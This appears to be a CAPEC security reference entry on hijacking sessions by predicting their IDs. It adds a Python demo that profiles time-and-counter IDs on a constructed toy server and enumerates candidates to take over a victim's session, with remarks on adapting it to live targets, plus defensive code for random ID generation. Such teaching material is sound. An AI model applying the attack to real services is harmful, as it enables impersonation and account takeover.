CAPEC Details
Name Session Credential Falsification through Prediction
Likelihood of attack: High
Typical severity: High
Summary This attack targets predictable session IDs in order to gain privileges. An attacker who can predict the session ID assigned to another user's transaction can spoof that user and hijack the session.
Prerequisites The target host uses session IDs to keep track of users. Session IDs are used to control access to resources. The session IDs issued by the target host are predictable, for example because they are derived from information an attacker can observe or guess (e.g., time, or a value that increments with each session).
Execution Flow
Step Phase Description Techniques
1 Explore [Find Session IDs] The attacker interacts with the target host and finds that session IDs are used to authenticate users.
  • An attacker makes many anonymous connections and records the session IDs assigned.
  • An attacker makes authorized connections and records the session tokens or credentials issued.
2 Explore [Characterize IDs] The attacker studies the characteristics of the session ID (size, format, etc.). As a result, the attacker finds that legitimate session IDs are predictable.
  • Cryptanalysis. The attacker uses cryptanalysis to determine if the session IDs contain any cryptographic protections.
  • Pattern tests. The attacker looks for patterns (odd/even, repetition, multiples, or other arithmetic relationships) between IDs.
  • Comparison against time. The attacker plots or compares the issued IDs against the time they were issued to check for correlation.
3 Experiment [Match issued IDs] The attacker enumerates candidate session ID values and succeeds in predicting a valid session ID.
  • The attacker models the session ID algorithm well enough to produce compatible session IDs, or just one match.
4 Exploit [Use matched Session ID] The attacker uses the falsified session ID to access the target system.
  • The attacker loads the session ID into their web browser and browses to restricted data or functionality.
  • The attacker loads the session ID into their network communications and impersonates a legitimate user to gain access to data or functionality.
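The four steps above, worked through as an added example that is not part of the CAPEC entry: a constructed toy server issues the kind of predictable ID the prerequisites describe (hex of the issue time in milliseconds followed by a four-hex-digit counter), and the attacker code collects anonymous IDs, runs the pattern and time-correlation tests, brackets a victim's login between two of its own anonymous sessions, and enumerates the small gap in between. The ID format and every name here (FakeClock, WeakSessionServer, characterize, bracket_and_hijack, run_demo) are assumptions made for illustration, not a real product's scheme.

```python
import time
from itertools import count


class FakeClock:
    """Constructed clock for a deterministic run: a fixed epoch that advances
    7 ms on every read. Pass lambda: int(time.time() * 1000) for wall-clock."""

    def __init__(self, start_ms=1_700_000_000_000, step_ms=7):
        self.ms, self.step = start_ms, step_ms

    def __call__(self):
        self.ms += self.step
        return self.ms


class WeakSessionServer:
    """Constructed toy server with the flaw this entry targets: the session ID
    is hex(issue time in ms) + a 4-hex-digit process counter, so it is
    monotonic, time-correlated and contains no secret randomness."""

    def __init__(self, now_ms=lambda: int(time.time() * 1000)):
        self._now_ms = now_ms
        self._counter = count(1)
        self._sessions = {}  # session ID -> username (None = anonymous)

    def new_session(self, user=None):
        sid = f"{self._now_ms():x}{next(self._counter):04x}"
        self._sessions[sid] = user
        return sid

    def whoami(self, sid):
        """What a request carrying `sid` sees: a username, or None for
        anonymous and unknown IDs alike."""
        return self._sessions.get(sid)


def characterize(samples):
    """Step 2 (Characterize IDs). `samples` are (observed_issue_ms, sid) pairs.
    Pattern test: are IDs monotonic, and do the low bits step arithmetically?
    Time test: does the high part track the time at which the ID was issued?"""
    values = [int(sid, 16) for _, sid in samples]
    low16 = [v & 0xFFFF for v in values]
    high = [v >> 16 for v in values]
    return {
        "monotonic": all(b > a for a, b in zip(values, values[1:])),
        "low16_steps": sorted({b - a for a, b in zip(low16, low16[1:])}),
        "high_tracks_time": all(h == t for h, (t, _) in zip(high, samples)),
    }


def bracket_and_hijack(server, victim_logs_in):
    """Steps 3 and 4. The attacker takes an anonymous ID just before and just
    after the victim authenticates, enumerates the (time, counter) gap between
    them, and presents each candidate until one resolves to a real user."""
    before = server.new_session()
    victim_logs_in()                 # the victim's ID is never shown to the attacker
    after = server.new_session()
    b, a = int(before, 16), int(after, 16)
    t_lo, c_lo = b >> 16, b & 0xFFFF
    t_hi, c_hi = a >> 16, a & 0xFFFF
    tried = 0
    for c in range(c_lo + 1, c_hi):        # counters handed out in between
        for t in range(t_lo, t_hi + 1):    # ms window; widen for clock drift on a live target
            candidate = f"{t:x}{c:04x}"
            tried += 1
            user = server.whoami(candidate)
            if user is not None:
                return user, candidate, tried
    return None, None, tried


def run_demo(n_samples=8):
    """Steps 1 through 4 end to end; returns what the attacker learned."""
    clock = FakeClock()
    server = WeakSessionServer(now_ms=clock)
    samples = []
    for _ in range(n_samples):            # Step 1: many anonymous connections
        sid = server.new_session()
        samples.append((clock.ms, sid))   # attacker notes when each ID was issued
    profile = characterize(samples)
    issued = []                           # only so the demo can confirm the match
    user, candidate, tried = bracket_and_hijack(
        server, lambda: issued.append(server.new_session(user="alice")))
    return {"profile": profile, "hijacked_user": user,
            "matched_victim": candidate == issued[0], "candidates_tried": tried}


if __name__ == "__main__":
    print(run_demo())
```

With the constructed 7 ms clock the gap holds one counter value and a 15 ms window, so the victim's ID falls on the 8th candidate; on a live target the attacker widens the time window to cover clock drift and request latency, which still leaves a search space of a few thousand values rather than the 2^64 or more a properly random ID would require.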
Solutions
  • Use a strong source of randomness (a cryptographically secure PRNG) to generate session IDs.
  • Use session IDs of adequate length.
  • Do not use information available to the user (e.g., time) to generate session IDs.
  • Ideas for creating random numbers are offered by Eastlake [RFC1750] (since obsoleted by RFC 4086, which carries the same guidance).
  • Encrypt the session ID if you expose it to the user; for instance, the session ID can be stored in a cookie in encrypted format. Encrypting a predictable ID hides its structure but adds no entropy, so this complements random generation rather than replacing it.
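The first three recommendations in working form, as an added example that is not part of the CAPEC entry: issue_session_id draws 256 bits from the OS CSPRNG via Python's secrets module, and varying_bit_positions is a crude black-box check a reviewer can run over a batch of issued IDs, counting the bit positions that ever change; positions that never change carry no entropy, so a low count exposes a time-or-counter-derived ID regardless of its printed length. The weak sample set is constructed inline (the same time-plus-counter shape as the attack above) and the function names are assumptions for illustration.

```python
import math
import secrets

TOKEN_BYTES = 32  # 256 bits of CSPRNG output, well above the 64-bit floor (CWE-6, CWE-331)


def issue_session_id():
    """Session ID from the OS CSPRNG: unpredictable, URL-safe base64, 43 characters."""
    return secrets.token_urlsafe(TOKEN_BYTES)


def nominal_entropy_bits(sid, alphabet_size):
    """Upper bound on entropy if every character were uniform over the alphabet."""
    return len(sid) * math.log2(alphabet_size)


def varying_bit_positions(ids):
    """Crude black-box check: count bit positions (of the ASCII encoding) that
    change across a sample set of equal-length IDs. A position that never
    changes carries no entropy, so a small count means the ID is mostly
    structure, whatever its nominal length."""
    assert len({len(s) for s in ids}) == 1, "compare IDs of one length only"
    values = [int.from_bytes(s.encode("ascii"), "big") for s in ids]
    width = len(ids[0]) * 8
    return sum(1 for pos in range(width) if len({(v >> pos) & 1 for v in values}) > 1)


def compare(n=64, start_ms=1_700_000_000_000):
    """Constructed comparison: time-plus-counter IDs issued 7 ms apart (the flaw
    on this page) against CSPRNG-based IDs, both over n samples."""
    weak = [f"{start_ms + 7 * i:x}{i:04x}" for i in range(n)]
    strong = [issue_session_id() for _ in range(n)]
    return {"weak": varying_bit_positions(weak), "strong": varying_bit_positions(strong)}


if __name__ == "__main__":
    print(compare())
```

Over 64 samples the constructed weak IDs vary in about 20 bit positions (the low hex digits of the timestamp and counter), while the secrets-based IDs vary in roughly 300, close to the 6 bits per base64url character that nominal_entropy_bits reports. The check only bounds entropy from above, so a high count is necessary rather than sufficient; the real assurance comes from using the CSPRNG in the first place.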
Related Weaknesses
CWE ID Description
CWE-6 J2EE Misconfiguration: Insufficient Session-ID Length
CWE-200 Exposure of Sensitive Information to an Unauthorized Actor
CWE-285 Improper Authorization
CWE-290 Authentication Bypass by Spoofing
CWE-330 Use of Insufficiently Random Values
CWE-331 Insufficient Entropy
CWE-346 Origin Validation Error
CWE-384 Session Fixation
CWE-488 Exposure of Data Element to Wrong Session
CWE-539 Use of Persistent Cookies Containing Sensitive Information
CWE-693 Protection Mechanism Failure
CWE-719 OWASP Top Ten 2007 Category A8 - Insecure Cryptographic Storage
Related CAPECS
CAPEC ID Description
CAPEC-196 An attacker creates a false but functional session credential in order to gain or usurp access to a service. Session credentials allow users to identify themselves to a service after an initial authentication without needing to resend the authentication information (usually a username and password) with every message. If an attacker is able to forge valid session credentials they may be able to bypass authentication or piggy-back off some other authenticated user's session. This attack differs from Reuse of Session IDs and Session Sidejacking attacks in that in the latter attacks an attacker uses a previous or existing credential without modification while, in a forging attack, the attacker must create their own credential, although it may be based on previously observed credentials.
Taxonomy: WASC
Entry ID Entry Name
18 Credential/Session Prediction
Taxonomy: OWASP Attacks
Entry Name
Session Prediction